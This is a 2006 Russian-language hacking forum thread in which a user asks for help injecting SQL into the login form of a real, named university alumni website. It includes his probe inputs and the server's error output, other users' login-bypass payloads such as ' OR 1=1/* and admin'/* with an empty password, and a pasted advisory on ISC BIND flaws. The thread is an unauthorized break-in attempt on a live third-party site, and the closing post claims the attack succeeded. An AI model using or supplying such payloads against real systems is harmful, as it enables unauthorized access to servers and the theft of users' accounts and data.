Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   помогите с sql inj (https://forum.antichat.xyz/showthread.php?t=18362)

LoFFi 29.04.2006 11:57

помогите с sql inj
 
Вообщем есть сервер, на нем есть страничка ASP на которой стандартная форма login:pass

опробовал я ее на скуль

login: ' or '
pass: 123

ответ
Код:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '123'.

/asp/members.asp, line 94


login: 123
pass: ' or '

Код:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string 'or ') AND (approve = 1)'.

/asp/members.asp, line 94



Вот........ только вот не пойму, что с этого можно поиметь, если учесть то, что каждый пользователь в системе имеет RANDOM логин, то есть логина админа я не знаю...

m0nzt3r 29.04.2006 12:20

а так:
login'*/
а пасс пустой кажется..

LoFFi 29.04.2006 12:23

а так же что можно, а точнее как можно что то поиметь с этого?

Обнаружено несколько уязвимостей в ISC Bind.
1. Возможно выполнение произвольного кода из-за ошибки при обработке запроса, содержащего неправильный параметр ключа в записи TSIG. Атакующий может переполнить стек и выполнить произвольный код на уязвимой системе.
2. Удаленный атакующий может получить доступ на чтение переменных окружения из стека с помощью специально сформированного рекурсивного запроса.
3. Возможен отказ в обслуживании. Обнаружена ошибка при переносах зон ZXFR. Удаленный атакующий может запросить ZXFR, которая не существует в кеше сервера имен, что приведет к аварийной остановке службы.


если кто знает - пишите.... оч надо =(

m0nzt3r 29.04.2006 12:27

дал бы ссылку, было бы еще легче.
1.Найди, где там Tsig.

LoFFi 29.04.2006 12:46

Ссылка в ЛС

Trinux 29.04.2006 15:21

да все просто, если там не слешируются или не фильтруются ковычки, то в логин либо
' OR 1=1/*
и пасс пустой, либо как предлогал монстр, подбирать логины
admin'/*
root'/*
итп и пасс пустой, либо
' OR '1'='1
в оба поля и авторизуешься с первой учетной записью в БД

m0nzt3r 29.04.2006 17:19

никакой не пашет...только при ' or ' выводит ошибку и запрос , а при других просто говоит, что ошибка в таком-то скрипте.

LoFFi 29.04.2006 22:28

http://alumni.kimep.kz/asp/members.asp

вот.... люди, оч надо! репу гарантирую =)

m0nzt3r 10.05.2006 14:38

Закрыто.Решение готово %)


Время: 09:18